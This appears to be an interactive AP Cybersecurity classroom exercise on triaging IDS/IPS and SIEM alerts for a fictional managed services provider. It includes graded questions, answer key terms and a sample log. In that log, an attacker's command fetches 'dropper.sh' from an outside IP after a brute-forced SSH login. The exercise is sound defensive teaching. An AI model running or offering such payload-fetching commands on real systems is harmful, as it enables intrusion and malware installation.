AP Cybersecurity Unit 3 Lesson 5 Exercise 1

Unit 3 • 3.5 • Exercise 1

Exercise 1 — IDS/IPS Alert Triage

3 parts, 24 points — Classify and respond to live security alerts at NovaTech Solutions

Score: 0 / 24Complete all parts to see your final score
Client Organization
NovaTech Solutions

NovaTech Solutions is a mid-size managed services provider (MSP) that remotely manages IT infrastructure for 40 client companies. Their Security Operations Center (SOC) runs a network-based IDS at the perimeter, host-based IPS sensors on all client servers, and a centralized SIEM that ingests firewall logs, endpoint telemetry, DNS queries, and authentication events. This morning the SOC received the following alert queue.

Alert ID Source Signature Src IP Sev Count
A-001 Network IDS SQL injection attempt - UNION SELECT 185.220.101.7 HIGH 847
A-002 Host IPS Port scan detected - TCP SYN flood 10.4.22.19 MED 1
A-003 SIEM Correlation Brute force threshold exceeded - 50 failures in 60s 192.168.3.45 HIGH 3
A-004 Network IDS Anomaly: DNS query volume 400% above baseline 10.0.2.88 MED 1
A-005 Host IPS Outbound connection blocked - known C2 domain 172.16.8.101 HIGH 12
Part 1 — Classify Each Alert
8 points

For each alert, select whether it is most likely a true positive, a false positive, or requires investigation before a determination can be made. Use the alert table and your knowledge of IDS/IPS behavior.

Alert A-001 (SQL injection, 847 occurrences, external IP)
Alert A-002 (TCP SYN flood from internal IP, single occurrence)
Alert A-003 (Brute force threshold, 3 simultaneous users affected, internal IP)
Alert A-004 (Anomaly-based DNS volume spike, single occurrence, internal)
Alert A-005 (Outbound blocked to known C2 domain, 12 attempts, internal server)
Part 2 — Prioritized Response Actions
8 points

Alert A-005 has been confirmed as a true positive — the host at 172.16.8.101 has malware that is attempting to communicate with a command-and-control server. Select all correct immediate response actions. Then select the highest priority single action.

Select ALL appropriate immediate response actions (select all that apply):
Which single action must happen FIRST?
Part 3 — SIEM Log Analysis
8 points

The SIEM generated the following correlated log excerpt after Alert A-003 was triggered. Analyze the log and answer both questions below.

2026-04-15 08:42:01 AUTH_FAIL src=192.168.3.45 user=admin svc=SSH 2026-04-15 08:42:03 AUTH_FAIL src=192.168.3.45 user=admin svc=SSH 2026-04-15 08:42:05 AUTH_FAIL src=192.168.3.45 user=root svc=SSH 2026-04-15 08:42:07 AUTH_FAIL src=192.168.3.45 user=administrator svc=SSH 2026-04-15 08:42:31 [SIEM RULE: BRUTE_FORCE_SSH] threshold=50 window=60s source=192.168.3.45 TRIGGERED 2026-04-15 08:43:14 AUTH_SUCCESS src=192.168.3.45 user=admin svc=SSH 2026-04-15 08:43:19 CMD_EXEC src=192.168.3.45 user=admin cmd="wget http://185.220.101.7/dropper.sh"
Q1: The source IP 192.168.3.45 is an internal address. What does this tell you about where the brute force attack is likely originating from? What additional SIEM correlation would you run next?
Key terms: internal, compromised, pivot, lateral, insider, VPN, correlation, other hosts, same subnet
Q2: The SIEM triggered its brute force rule, but the attacker still successfully authenticated (08:43:14) and executed a command (08:43:19). What two control failures does this sequence reveal?
Key terms: automated block, no lockout, rule did not block, threshold too high, execution not prevented, IPS passive, detection only, no prevention
0 / 24
IDS/IPS Alert Triage Score
Complete all 3 parts to see your result.
AP Cybersecurity · Unit 3 · Lesson 3.5 · Exercise 1
LessonExercise 1LabQuiz

Get in Touch

Whether you're a student, parent, or teacher — I'd love to hear from you.

Just want free AP CS resources?

Enter your email below and check the subscribe box — no message needed. Students get daily practice questions and study tips. Teachers get curriculum resources and teaching strategies.

Typically responds within 24 hours

Message Sent!

Thanks for reaching out. I'll get back to you within 24 hours.

🏫 Welcome, fellow educator!

I offer curriculum resources, practice materials, and study guides designed for AP CS teachers. Let me know what you're looking for — whether it's classroom materials, a guest speaker, or Teachers Pay Teachers resources.

Email

[email protected]

📚

Courses

AP CSA, CSP, & Cybersecurity

Response Time

Within 24 hours

Prefer email? Reach me directly at [email protected]